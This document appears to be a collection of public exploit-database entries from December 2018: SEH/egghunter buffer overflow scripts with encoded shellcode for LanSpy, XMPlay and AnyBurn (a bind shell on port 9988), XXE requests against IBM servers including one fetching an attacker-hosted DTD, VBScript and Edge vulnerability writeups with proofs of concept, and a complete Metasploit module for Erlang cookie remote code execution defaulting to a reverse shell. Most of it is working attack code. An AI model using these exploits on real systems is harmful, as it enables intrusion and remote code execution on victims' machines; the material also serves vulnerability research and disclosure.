# Exploit Title: LanSpy 2.0.1.159 - Local Buffer Overflow (SEH) (Egghunter)
# Exploit Author: bzyo
# Date: 12-19-18
# Twitter: @bzyo_
# Vulnerable Software: LanSpy 2.0.1.159
# Vendor Homepage: https://lizardsystems.com
# Version: 2.0.1.159
# Software Link 1: https://www.exploit-db.com/apps/70a780b78ee7dbbbbc99852259f75d53-lanspy_setup_2.0.1.159.exe
# Software Link 2: https://lizardsystems.com/download/lanspy_setup.exe
# Tested Windows 7 SP1 x86
# PoC
# 1. run script
# 2. copy/paste calcpayload.txt contents into scan section of app
# 3. remove previous search contents
# 4. copy/paste egghpayload.txt contents into scan section of app
# 5. wait for egg to be found
# 6. pop calc
# was working on this when i saw seh poc published
# submitting for the lulz
# original dos poc from Gionathan "John" Reale, EDB: 45968
# original seh poc from Juan Prescotto, EDB: 46009
# bad chars observed so far: 0x00, 0x01 and 0x20 (space); there may be more, which is presumably why both stages below are x86/alpha_mixed encoded
#!/usr/bin/python
import struct
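file1 = "calcpayload.txt"
file2 = "egghpayload.txt"


def _p32(addr):
    """Pack a 32-bit address little-endian as a 4-char *text* string.

    struct.pack() returns bytes on Python 3, which cannot be concatenated with
    the str-typed payload pieces below; building the four chars by hand keeps
    the whole payload a str on both Python 2 and 3 (it is turned into raw
    bytes only when written out).
    """
    return "".join(chr((addr >> (8 * i)) & 0xff) for i in range(4))


def _write_raw(path, text):
    """Write *text* to *path* as raw bytes.

    latin-1 maps every code point 0..255 to the identical byte, so the \\x..
    escapes above reach the file unchanged; a text-mode write on Python 3
    would UTF-8 encode anything >= 0x80 and corrupt the payload.
    """
    data = text if isinstance(text, bytes) else text.encode("latin-1")
    with open(path, "wb") as fh:
        fh.write(data)


# ---- stage 2: egghunter payload (pasted second, see steps above) ----------
# Layout, left to right:
#   junk3 | nops | eggh | nops | jmp2 | junk2 | jmp1 | junk1 | nseh | seh
junk3 = "A" * 506
# 125 bytes encoded egghunter 'BZYO'
# msfvenom -p generic/custom PAYLOADFILE=eggh -e x86/alpha_mixed -f python
eggh = ""
eggh += "\x89\xe5\xdd\xc2\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a"
eggh += "\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37"
eggh += "\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
eggh += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
eggh += "\x50\x38\x41\x42\x75\x4a\x49\x62\x46\x6e\x61\x6b\x7a"
eggh += "\x39\x6f\x34\x4f\x71\x52\x76\x32\x63\x5a\x45\x52\x63"
eggh += "\x68\x6a\x6d\x54\x6e\x37\x4c\x54\x45\x31\x4a\x30\x74"
eggh += "\x78\x6f\x78\x38\x42\x6f\x50\x59\x43\x6a\x53\x72\x6c"
eggh += "\x4b\x68\x7a\x6e\x4f\x31\x65\x4a\x4a\x6e\x4f\x31\x65"
eggh += "\x4b\x57\x6b\x4f\x6b\x57\x41\x41"
# jmp2: e9 30 ff ff ff = jmp rel32 -0xd0 (-208) measured from the end of the
# instruction. 10 + 125 + 10 = 145 bytes (nops/eggh/nops) sit between junk3
# and jmp2, so this lands 58 bytes inside junk3; "A" is `inc ecx`, harmless,
# and execution slides through the nops into the egghunter.
jmp2 = "\xe9\x30\xff\xff\xff"
junk2 = "\xcc" * 6          # int3 filler: a mis-landed jump shows up in a debugger
# jmp1: the eb f1 at jmp1+2 is jmp short -15 from jmp1+4, i.e. to jmp1-11,
# which is the start of jmp2 (jmp2 + junk2 = 5 + 6 bytes precede jmp1).
jmp1 = "\xcc\xcc\xeb\xf1\xcc\xcc"
junk1 = "\xcc" * 16
# nseh: eb ea = jmp short -22 from nseh+2, i.e. to nseh-20. junk1 (16) and
# jmp1 (6) precede nseh, so nseh-20 is jmp1+2: the two leading int3 bytes of
# jmp1 are skipped and its jmp executes.
nseh = "\xeb\xea\xcc\xcc"
# 0x00458148 : pop ecx # pop ebp # ret 0x04
# Presumably inside LanSpy's own image (no rebase); the address contains a
# NUL byte, which is only tolerable because the SEH record is the very last
# thing in the buffer.
seh = _p32(0x00458148)
# 10 nops
nops = "\x90" * 10
egghpayload = junk3 + nops + eggh + nops + jmp2 + junk2 + jmp1 + junk1 + nseh + seh

# ---- stage 1: calc payload (pasted first so it is resident in memory) -----
calcjunk1 = "D" * 26
# 8 byte egg: the tag repeated twice, written byte-reversed relative to the
# 'BZYO' name the hunter above was generated with.
bzyo = "OYZBOYZB"
# 440 bytes for calc
# msfvenom -p windows/exec CMD="calc" -e x86/alpha_mixed -f python
calc = ""
calc += "\x89\xe2\xdd\xc5\xd9\x72\xf4\x58\x50\x59\x49\x49\x49"
calc += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
calc += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
calc += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
calc += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x58\x68\x6f"
calc += "\x72\x63\x30\x53\x30\x55\x50\x45\x30\x4b\x39\x79\x75"
calc += "\x54\x71\x39\x50\x33\x54\x4e\x6b\x52\x70\x66\x50\x6c"
calc += "\x4b\x73\x62\x34\x4c\x4c\x4b\x71\x42\x32\x34\x4c\x4b"
calc += "\x71\x62\x47\x58\x34\x4f\x4e\x57\x62\x6a\x46\x46\x35"
calc += "\x61\x6b\x4f\x6c\x6c\x35\x6c\x51\x71\x33\x4c\x74\x42"
calc += "\x76\x4c\x71\x30\x4f\x31\x68\x4f\x76\x6d\x77\x71\x7a"
calc += "\x67\x5a\x42\x58\x72\x56\x32\x32\x77\x4c\x4b\x43\x62"
calc += "\x52\x30\x6e\x6b\x30\x4a\x67\x4c\x4c\x4b\x50\x4c\x34"
calc += "\x51\x44\x38\x49\x73\x50\x48\x35\x51\x5a\x71\x76\x31"
calc += "\x6c\x4b\x66\x39\x37\x50\x33\x31\x78\x53\x6c\x4b\x53"
calc += "\x79\x57\x68\x69\x73\x56\x5a\x77\x39\x4e\x6b\x46\x54"
calc += "\x6c\x4b\x56\x61\x6a\x76\x30\x31\x4b\x4f\x4c\x6c\x49"
calc += "\x51\x48\x4f\x44\x4d\x47\x71\x59\x57\x65\x68\x4b\x50"
calc += "\x52\x55\x69\x66\x34\x43\x71\x6d\x4b\x48\x37\x4b\x63"
calc += "\x4d\x66\x44\x70\x75\x4b\x54\x63\x68\x4c\x4b\x70\x58"
calc += "\x31\x34\x75\x51\x4a\x73\x45\x36\x6e\x6b\x76\x6c\x42"
calc += "\x6b\x4e\x6b\x32\x78\x67\x6c\x57\x71\x59\x43\x4e\x6b"
calc += "\x47\x74\x4e\x6b\x45\x51\x68\x50\x4d\x59\x30\x44\x34"
calc += "\x64\x61\x34\x43\x6b\x31\x4b\x61\x71\x70\x59\x70\x5a"
calc += "\x70\x51\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x42\x7a\x6e"
calc += "\x6b\x47\x62\x48\x6b\x4c\x4d\x31\x4d\x52\x4a\x77\x71"
calc += "\x4e\x6d\x6f\x75\x6e\x52\x53\x30\x65\x50\x57\x70\x30"
calc += "\x50\x50\x68\x50\x31\x6e\x6b\x52\x4f\x4f\x77\x39\x6f"
calc += "\x69\x45\x4f\x4b\x68\x70\x6f\x45\x39\x32\x36\x36\x52"
calc += "\x48\x4e\x46\x6c\x55\x6d\x6d\x4f\x6d\x49\x6f\x4a\x75"
calc += "\x57\x4c\x36\x66\x53\x4c\x35\x5a\x4f\x70\x49\x6b\x39"
calc += "\x70\x53\x45\x74\x45\x6f\x4b\x71\x57\x45\x43\x33\x42"
calc += "\x70\x6f\x52\x4a\x65\x50\x66\x33\x59\x6f\x7a\x75\x55"
calc += "\x33\x33\x51\x32\x4c\x65\x33\x33\x30\x41\x41"
calcjunk2 = "E" * 30
calcpayload = calcjunk1 + bzyo + calc + calcjunk2

_write_raw(file1, calcpayload)
_write_raw(file2, egghpayload)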
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: XMPlay 3.8.3 - '.m3u' Code Execution (PoC)
# Date: 2018-12-19
# Exploit Author: s7acktrac3
# Vendor Homepage: https://www.xmplay.com/
# Software Link: https://support.xmplay.com/files_view.php?file_id=676
# Version: 3.8.3 (latest)
# Tested on: Windows XP SP3
# CVE : Reserved
#
# Developer notified & delivered PoC but not interested in fixing :P
#
# Reproduction Steps:
# Launch XMPlay & run this PoC script - it will create a file in the same directory named xmplay.m3u
# Either drag xmplay.m3u into the XMPlay window or use the File menu to select xmplay.m3u. Application will "load"
# for a minute (exploit searching through memory for payload) and eventually launch calc.exe
#
# Major Shouts @Gokhan @foolsofsecurity for helping turn the DoS into Code execution & me into more of a
# beast!
from struct import pack
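max_size = 728
# C:\Documents and Settings\Administrator\Desktop\Exploit Dev\xmplay_383-poc.py
eip_offset = 500


def _p32(addr):
    """Little-endian 32-bit address as a 4-char str (works on Python 2 and 3).

    struct.pack() returns bytes on Python 3 and cannot be added to the str
    pieces below. Every byte of the address used here is < 0x80, so the
    text-mode write at the end emits it unchanged.
    """
    return "".join(chr((addr >> (8 * i)) & 0xff) for i in range(4))


# Header lines use "\n\r" (as published); text mode may translate the "\n" on Windows.
file_header = "#EXTM3U\n\r"
file_header += "#EXTINF:200,Sleep Away\n\r"
file_header += "http://test."
# cat egghunter.txt | tr -d '"' | tr -d '\n' | tr -d '\\x' | xxd -r -p > egghunter.bin
# msfvenom -p generic/custom PAYLOADFILE=egghunter.bin -e x86/alpha_mixed BufferRegister=EDX -a x86 --platform Windows
# The stub opens with 17 x \x4a (`dec edx`); it expects EDX to point at itself.
encoded_egg_hunter = (""
    "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x4a"
    "\x4a\x4a\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
    "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
    "\x38\x41\x42\x75\x4a\x49\x62\x46\x6f\x71\x4b\x7a\x49\x6f\x44"
    "\x4f\x53\x72\x36\x32\x61\x7a\x46\x62\x66\x38\x78\x4d\x64\x6e"
    "\x75\x6c\x75\x55\x63\x6a\x54\x34\x68\x6f\x6d\x68\x63\x47\x34"
    "\x70\x54\x70\x72\x54\x4e\x6b\x58\x7a\x4e\x4f\x42\x55\x6b\x5a"
    "\x4c\x6f\x31\x65\x78\x67\x59\x6f\x39\x77\x41\x41")
# "w00tw00t" is the 8-byte egg the hunter scans memory for; the stub after it
# points ESI at the encoded calc bytes that follow.
encoded_calc = "w00tw00t" + "\x57\x58\x04\x06\x50\x5E" # PUSH EDI, POP EAX, ADD AL,6, PUSH EAX, POP ESI
encoded_calc += "\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49"
encoded_calc += "\x49\x49\x49\x49\x49\x49\x49\x49\x37\x51"
encoded_calc += "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
encoded_calc += "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
encoded_calc += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75"
encoded_calc += "\x4a\x49\x36\x51\x49\x59\x52\x71\x61\x78"
encoded_calc += "\x75\x33\x50\x61\x72\x4c\x31\x73\x73\x64"
encoded_calc += "\x6e\x58\x49\x57\x6a\x33\x39\x52\x64\x37"
encoded_calc += "\x6b\x4f\x38\x50\x41\x41"
# Net effect: EDX = ESP + 0x4C. 3 * 0x5555553C wraps to 0xFFFFFFB4 == -0x4C,
# so three subtractions add 0x4C without a NUL byte in the immediate.
# Counted from the "BBBB" ESP points at after `jmp esp`, the hunter starts at
# +4+76 = +0x50, four bytes past where EDX lands; the author reports this
# works as published -- re-check in a debugger before porting.
egg_addr_to_edx = ""
egg_addr_to_edx += "\x54" # PUSH ESP
egg_addr_to_edx += "\x58" # POP EAX
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x2D\x3C\x55\x55\x55" # SUB EAX,5555553C
egg_addr_to_edx += "\x50" # PUSH eax
egg_addr_to_edx += "\x5A" # POP EDX

payload = "A" * 12
payload += encoded_calc
payload += "A" * (eip_offset - len(payload))
print("Length of payload " + str(len(payload)))
# Jmp esp OS DLL -- specific to the tested Windows XP SP3 build (no ASLR there).
payload += _p32(0x78196d4d)
payload += "BBBB"                                    # 0x42 = inc edx; executed, harmless
payload += egg_addr_to_edx
payload += "C" * (76 - len(egg_addr_to_edx))         # 0x43 = inc ebx; executed, harmless
payload += encoded_egg_hunter
if len(payload) > max_size:
    # the original silently produced an oversized buffer here ("C" * negative == "")
    raise ValueError("payload is %d bytes, more than max_size=%d" % (len(payload), max_size))
payload += "C" * (max_size - len(payload))
stupid_char = "|"
print("[+] Creating .m3u file with payload size: " + str(len(payload)))
exploit = file_header + payload + stupid_char
with open('xmplay.m3u', 'w') as fh:
    fh.write(exploit)
print("[+] Done creating the file")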
# Exploit Title: [XML External Entity Injection (XXE)]
# Date: [2018-12-18]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10744149]
# Version: [v8.6 - v8.7 - v8.8 - v8.9]
# Tested on: [Windows 10]
# CVE : [CVE-2018-1821]
POC#1: Port Scanning (blind SSRF through external DTD resolution):
The parser resolves the DOCTYPE SYSTEM URI server-side, so pointing it at ftp://127.0.0.1:&lt;port&gt; makes the server probe its own ports; open vs. closed can typically be told apart from response time or error text.
======================
POST /res/api/v1/ruleapps?csrf_token=kgwGZpsLIpCrCuS3s2mLS4%2BuXKM%3D HTTP/1.1
Host: 172.25.28.35:9443
Connection: close
Content-Length: 83
Origin: https://172.25.28.35:9443
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Content-Type: application/xml
Accept: */*
Referer: https://172.25.28.35:9443/res/protected/rest.jsf
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=0000EKq5uAZFEICNv26D32qeVid:1c4i4k9om; LtpaToken2=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
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "ftp://127.0.0.1:21">
POC#2: Using an attacker-hosted External DTD File (fetched out-of-band from 172.17.85.67:5555; the contents of mydtd.dtd are not included here):
======================================
POST /rest/bpm/monitor/events HTTP/1.1
Host: 172.25.28.41:9445
Connection: close
Cache-Control: max-age=0
Authorization: Basic Ym1hZG1pbjpibWFkbWlu
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPAction: "CBE_FOR_EACH_TRANSACTION_REQUESTI"
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=00002W7K2hStpCQu03vef0J3Lyt:1cd2vk5q4; com.ibm.wbimonitor.UserName=bmadmin; MUMLogoutURL=https://172.25.28.41:9445/mum/logout; LtpaToken2=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
Content-Length: 99
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://172.17.85.67:5555/mydtd.dtd">
There is a reference leak in Microsoft VBScript that can be turned into a use-after-free given sufficient time. The vulnerability has been confirmed in Internet Explorer on various Windows versions with the latest patches applied.
Details:
VbsErase function is used to reset and free the contents of a VBScript array. When this function is called on a VBScript variable of the type array (implemented as a VAR structure containing a type followed by a value, in this case a pointer to a SafeArray object), the function follows these steps:
1. Get the pointer to a SafeArray object from the VBScript variable and store it locally
2. Set the pointer value in the VBScript variable to 0 (null)
3. Release the array members (by calling SafeArrayDestroyData)
4. Restore the pointer from step 2
5. Destroy the array object itself (by calling SafeArrayDestroyDescriptor)
6. Once again, set the pointer value in the VBScript variable to null
The dance with setting the pointer to null and restoring it was made to address previously reported vulnerabilities described in http://blogs.360.cn/post/from-a-patched-itw-0day-to-remote-code-execution-part-i-from-patch-to-new-0day.html.
However, this also introduced another bug. Specifically, if a user-defined callback runs during SafeArrayDestroyData, the callback can set the value of the VBScript variable passed to VbsErase to some other object (which increases the reference count of that object). If that happens, steps 4 and 6 above overwrite the pointer to the object, preventing its reference count from being properly decremented when the VBScript variable is later assigned some other value.
Consider the following code snippet:
====================================
' Demonstrates the VbsErase reference leak described above: erasing `a` runs
' class2's Class_Terminate from inside SafeArrayDestroyData, and the assignment
' made there is clobbered by VbsErase's later pointer restore / null steps, so
' the extra AddRef taken on the class1 object is never balanced.
Class class1
End Class
Class class2
Private Sub Class_Terminate()
' increase the reference count of c (this runs while `a` is being erased)
set a = c
End Sub
End Class
' create an object of class1 and increase its reference count
c = new class1
a = Array(0)
set a(0) = new class2
' call Class_Terminate of class2
Erase a
' a has been set to null so the following line doesn't affect c in any way
a = 1
' decrease the reference count of c
c = 1
' at this point the reference counter of c is 1 instead of 0: the object leaks
====================================
When the code snippet finishes, the class1 object created on the first line continues to live, even though all references to it have been lost, so it should have been destroyed. This same principle can be used to increase the reference count of an arbitrary object any number of times without incurring a memory cost, eventually overflowing the 32-bit reference counter.
Note that, while custom classes in VBScript have protection against overflowing a reference counter, this isn't the case for built-in objects (compare VBScriptClass::AddRef to AddRef methods of other classes). Because of this, the PoCs below use a RegExp object.
The only problem is that for every reference counter increment, a new array has to be created and destroyed and a user-defined Class_Terminate needs to run which all takes time. Overflowing the 32-bit reference counter can take around 2 hours (depending on the CPU) and way longer if page heap is enabled for the iexplore.exe process.
leak1.html (in attachment) contains the full PoC and leak1.txt contains a debug log for this.
If you don't want to wait, a quicker way to demonstrate the issue is to just run the reference counter increase for certain number of iterations, and then increase it further (close to overflowing) via a debugger.
leak2.html demonstrates this and leak2.txt contains the debug log (obtained in a 64 bit process with page heap enabled).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46022.zip
# Exploit Title: Microsoft Edge edgehtml.dll!Tree::ANode::DocumentLayout. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-11
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 42.17134.1.0 (Microsoft EdgeHTML 17.17134)
# Tested on: Windows 10 x64
# CVE : N/A
# Description:
# Access violation while reading memory at 0x5C using a NULL pointer (microsoftedgecp.exe!edgehtml.dll!Tree::ANode::DocumentLayout)
# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19594021/
PoC.html
<html>
<head>
<script>
// Sequence from the report: hit-test an element, relabel the <optgroup>
// (v2 resolves to the element with id="v2" through window named access),
// then execCommand("selectAll") on the multi-select. Per the description
// above this reads through a NULL node in Tree::ANode::DocumentLayout
// (offset 0x5C) and crashes the content process.
function ff() {
var v4= document.elementFromPoint(0,0);
v2.label = "C";
var v3= document.execCommand("selectAll", true);
}
</script>
</head>
<!-- ff() runs on load; the <select>/<option> are left unclosed as published -->
<body onload=ff()>
<select id="1" multiple="multiple">
<optgroup id="v2" label="A">
<option id="v1">
</body>
</html>
According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, starting from Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled for websites in the Internet Zone and the Restricted Sites Zone by default.
However, the VBScript execution policy does not appear to cover VBScript code in MSXML xsl files which can still execute VBScript, even when loaded from the Internet Zone.
To demonstrate, place the files in the attached archive on a web server in the Internet zone and open index.html. If successful, the text "Hello from VBScript" will be rendered on the page. If you look at the provided code, this text is assembled dynamically by VBScript running from the XSL file, i.e. outside the zone policy's reach.
This has been tested on Windows 10 Version 1803 with the latest patches applied and VBScript execution policy applied for the Internet Zone (HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\140C = 3).
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46023.zip
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
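class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  # Erlang external term format tag bytes used when building the rex call.
  VERSION_MAGIC     = 0x83
  SMALL_INTEGER_EXT = 0x61 # 'a'
  ATOM_EXT          = 0x64 # 'd'
  PID_EXT           = 0x67 # 'g'
  SMALL_TUPLE_EXT   = 0x68 # 'h'
  NIL_EXT           = 0x6a # 'j'
  STRING_EXT        = 0x6b # 'k'
  LIST_EXT          = 0x6c # 'l'

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Erlang Port Mapper Daemon Cookie RCE',
        'Description' => %q{
          The erlang port mapper daemon is used to coordinate distributed erlang instances.
          Should an attacker get the authentication cookie RCE is trivial. Usually, this
          cookie is named ".erlang.cookie" and varies on location. The module completes
          the distribution handshake with the supplied cookie and then asks the node's
          rex (rpc) server to evaluate os:cmd/1 on the payload.
        },
        'Author' =>
          [
            'Daniel Mende', # blog post article
            'Milton Valencia (wetw0rk)', # metasploit module
          ],
        'References' =>
          [
            ['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
          ],
        'License' => MSF_LICENSE,
        'Platform' => ['unix', 'win'],
        'Arch' => ARCH_CMD,
        # The command runs as the Erlang node's OS user, not necessarily root.
        # (The original spelt this as the string 'false', which is truthy.)
        'Privileged' => false,
        'Targets' =>
          [
            [ 'Unix',
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
            ],
            [ 'Windows',
              'Platform' => 'win',
              'Arch' => ARCH_CMD,
              'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
            ]
          ],
        'DefaultTarget' => 0,
        'DisclosureDate' => 'Nov 20, 2009' # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history)
      )
    )

    register_options(
      [
        OptString.new('COOKIE', [ true, 'Erlang cookie to login with']),
        # Distribution listener of the target node, not epmd itself (4369); each
        # node picks its own port and registers it with epmd. 25672 is the value
        # RabbitMQ nodes commonly use.
        Opt::RPORT(25672)
      ])
  end

  # Handshake digest: MD5(Cookie ++ integer_to_list(Challenge)), i.e. the cookie
  # followed by the 32-bit big-endian challenge rendered in decimal.
  #
  # @param challenge [String] the 4 raw challenge bytes from SEND_CHALLENGE
  # @return [String] the 16 raw digest bytes
  def generate_challenge_digest(challenge)
    challenge_decimal = challenge.unpack('N')[0].to_s
    hash = Digest::MD5.new
    hash.update(datastore['COOKIE'])
    hash.update(challenge_decimal)
    vprint_status("MD5 digest generated: #{hash.hexdigest}")
    hash.digest
  end

  # ATOM_EXT: tag, 2-byte big-endian length, name.
  def atom(name)
    [ATOM_EXT, name.length].pack('Cn') + name.b
  end

  # PID_EXT: tag, node atom, ID = 3, Serial = 0, Creation = 0 (the same fixed
  # values the original hand-built message used).
  def pid(our_node)
    [PID_EXT].pack('C') + atom(our_node) + [3, 0, 0].pack('NNC')
  end

  # SEND_NAME: 2-byte length, 'n', version R6 (5), capability flags, our node name.
  def build_send_name(our_node)
    body = 'n'.b
    body << [5].pack('n')
    body << [0x0003499c].pack('N')
    body << our_node.b
    [body.length].pack('n') + body
  end

  # SEND_CHALLENGE_REPLY: 2-byte length, 'r', "our" challenge (the server's own
  # echoed back, as in the original) and the 16-byte digest: always 21 bytes.
  def build_challenge_reply(challenge)
    body = 'r'.b
    body << challenge.b
    body << generate_challenge_digest(challenge)
    [body.length].pack('n') + body
  end

  # Distribution SEND message ('p') carrying the REG_SEND control tuple
  # {6, FromPid, '', rex} followed by the message
  # {FromPid, {call, os, cmd, [Command], user}}, which rex evaluates as
  # os:cmd(Command).
  #
  # Every length is packed with 'n'/'N' rather than the original's
  # hex-string-through-pack('H*') trick, which produced a wrong byte for
  # single-nibble values (node names of 13..15 chars) and silently broke the
  # framing once a length exceeded 255.
  def build_rex_call(our_node, command)
    from_pid = pid(our_node)

    control = [VERSION_MAGIC, SMALL_TUPLE_EXT, 4, SMALL_INTEGER_EXT, 6].pack('C*')
    control << from_pid
    control << atom('')      # unused slot of REG_SEND
    control << atom('rex')   # destination registered name

    message = [VERSION_MAGIC, SMALL_TUPLE_EXT, 2].pack('C*')
    message << from_pid
    message << [SMALL_TUPLE_EXT, 5].pack('C*')
    message << atom('call')
    message << atom('os')
    message << atom('cmd')
    message << [LIST_EXT, 1].pack('CN')                  # one-element argument list
    message << [STRING_EXT, command.length].pack('Cn')   # STRING_EXT length is 16-bit
    message << command.b
    message << [NIL_EXT].pack('C')                       # list tail
    message << atom('user')                              # group leader

    body = 'p'.b + control + message
    [body.length].pack('N') + body
  end

  def exploit
    our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
    command = payload.raw
    if command.length > 0xffff
      fail_with(Failure::BadConfig, "Payload is #{command.length} bytes; STRING_EXT carries at most 65535")
    end

    connect

    # SEND_NAME: initial identification of who "we" are
    sock.put(build_send_name(our_node))

    # The reply normally holds SEND_STATUS ("\x00\x03sok", 5 bytes) followed by
    # SEND_CHALLENGE (2-byte length, 'n', version, flags, challenge, name), so
    # the 4-byte challenge sits at offset 14 -- provided both arrive in one read.
    print_status("Receiving server challenge")
    reply = sock.get.to_s
    challenge = reply[14, 4]
    if challenge.nil? || challenge.length != 4
      fail_with(Failure::UnexpectedReply, "Short handshake reply (#{reply.length} bytes); no challenge found")
    end

    print_status("Sending challenge reply")
    sock.put(build_challenge_reply(challenge))

    # An empty read here is taken to mean the node rejected our digest.
    if sock.get.to_s.empty?
      fail_with(Failure::UnexpectedReply, "Authentication Failed:#{datastore['COOKIE']}")
    end

    print_good("Authentication successful, sending payload")
    sock.put(build_rex_call(our_node, command))
  end
end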
#!/usr/bin/env python
# Exploit Title: AnyBurn 4.3 - Local Buffer Overflow (SEH Unicode)
# Date: 20-12-2018
# Exploit Author: Matteo Malvica
# Vendor Homepage: http://www.anyburn.com/
# Software Link : http://www.anyburn.com/anyburn_setup.exe
# Tested Version: 4.3 (32-bit)
# Tested on: Windows 7 x64 SP1
# Credits: original vulnerability discovered by Achilles: https://www.exploit-db.com/exploits/46002
# Steps to reproduce:
# 1.- Run the python code
# 2.- Open exploit.txt and copy its content to the clipboard
# 3.- Open AnyBurn and choose 'Copy disk to Image'
# 4.- Paste the content of exploit.txt into the field: 'Image file name'
# 5.- Click 'Create Now'
# 6.- Check with command prompt 'netstat -ano' and you should see a port listening on 9988
# 7.- With windows firewall disabled, from another host: 'nc [remote_IP] 9988'
# alphanumeric bindshell - port 9988, courtesy of b33f
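shellcode = (
    "PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
    "AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
    "BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
    "BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
    "KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
    "1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
    "CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
    "JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
    "IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
    "K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
    "SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
    "WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
    "6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
    "EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")
# total payload length 10000

# Alignment stub executed after the POP POP RET. The input is converted to
# UTF-16 by the application, so each byte below becomes <byte> 00; the \x6e
# "Venetian padding" absorbs the inserted NULs as harmless instructions and the
# add/sub pair moves EAX to EBP+0xB00 without any NUL-containing immediate.
align = (
    "\x55"          # push EBP - closer register to our shellcode, from where we are pivoting
    "\x6e"          # Venetian Padding
    "\x58"          # pop EAX
    "\x6e"          # Venetian Padding
    "\x05\x22\x11"  # add eax,0x11002200 \
    "\x6e"          # Venetian Padding |> +0xB00
    "\x2d\x17\x11"  # sub eax,0x11001700 /
    "\x6e"          # Venetian Padding
    "\x50"          # push EAX
    "\x6e"          # Venetian Padding
    "\xC3")         # RETN

# The SEH record must land at offset 9197; the slot before it holds 9150 bytes.
if len(shellcode) > 9197 - 47:
    raise ValueError("shellcode is %d bytes, more than the 9150-byte slot before the SEH record" % len(shellcode))

nseh = "\x94\x94" # ANSI x94 translates to Unicode 201D
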